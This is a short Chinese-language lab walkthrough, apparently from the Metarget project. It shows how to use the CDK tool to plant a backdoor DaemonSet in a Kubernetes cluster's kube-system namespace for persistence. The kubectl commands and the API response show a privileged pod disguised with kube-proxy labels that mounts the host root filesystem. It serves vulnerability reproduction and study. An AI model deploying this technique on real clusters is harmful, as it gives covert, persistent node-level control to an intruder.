Daemonset是K8s集群的一种资源,可在集群内的每个节点上部署Pod。
在集群内获取到一定的权限,需要对当前的权限进行持久化控制时,可利用K8s Daemonset资源的特性,创建一个kube-system命名空间下的Daemonset资源,进行持久化控制。
基础环境(Docker+K8s)准备(如果已经有任意版本的Docker+K8s环境则可跳过):
./metarget gadget install docker --version 18.03.1
./metarget gadget install k8s --version 1.16.5 --domestic漏洞环境准备:
./metarget cnv install k8s_backdoor_daemonset执行完成后,K8s集群内metarget命令空间下将会创建一个名为k8s-backdoor-daemonset的pod。
下载漏洞利用工具CDK,将其传入k8s-backdoor-daemonsetpod中:
sudo kubectl cp cdk k8s-backdoor-daemonset:/ -n metarget
执行以下命令运行工具(该命令会在kubs-system空间下创建一个daemonset资源):
sudo kubectl exec -it k8s-backdoor-daemonset /cdk run k8s-backdoor-daemonset default ubuntu "date > /tmp/flag ; sleep 10000"
查看执行结果包含以下字段则部署成功,也可通过运行sudo kubectl get ds -n kube-sytem | grep cdk 验证部署结果。
api-server response:
{"kind":"DaemonSet","apiVersion":"apps/v1","metadata":{"name":"cdk-backdoor-daemonset","namespace":"kube-system","selfLink":"/apis/apps/v1/namespaces/kube-system/daemonsets/cdk-backdoor-daemonset","uid":"78954f17-ef44-4e1f-9de3-d0703116ac87","resourceVersion":"4504","generation":1,"creationTimestamp":"2022-08-26T09:53:38Z","labels":{"k8s-app":"kube-proxy"},"annotations":{"deprecated.daemonset.template.generation":"1"}},"spec":{"selector":{"matchLabels":{"k8s-app":"kube-proxy"}},"template":{"metadata":{"creationTimestamp":null,"labels":{"k8s-app":"kube-proxy"}},"spec":{"volumes":[{"name":"host-volume","hostPath":{"path":"/","type":""}}],"containers":[{"name":"cdk-backdoor-pod","image":"ubuntu","args":["/bin/sh","-c","date \u003e /tmp/flag ; sleep 10000"],"resources":{},"volumeMounts":[{"name":"host-volume","mountPath":"/host-root"}],"terminationMessagePath":"/dev/termination-log","terminationMessagePolicy":"File","imagePullPolicy":"IfNotPresent","securityContext":{"capabilities":{"add":["NET_ADMIN","SYS_ADMIN","SYS_PTRACE","AUDIT_CONTROL","MKNOD","SETFCAP"]},"privileged":true}}],"restartPolicy":"Always","terminationGracePeriodSeconds":30,"dnsPolicy":"ClusterFirst","hostNetwork":true,"hostPID":true,"securityContext":{},"schedulerName":"default-scheduler"}},"updateStrategy":{"type":"RollingUpdate","rollingUpdate":{"maxUnavailable":1}},"revisionHistoryLimit":10},"status":{"currentNumberScheduled":0,"numberMisscheduled":0,"desiredNumberScheduled":0,"numberReady":0}}
注:复现后请及时清除相关资源。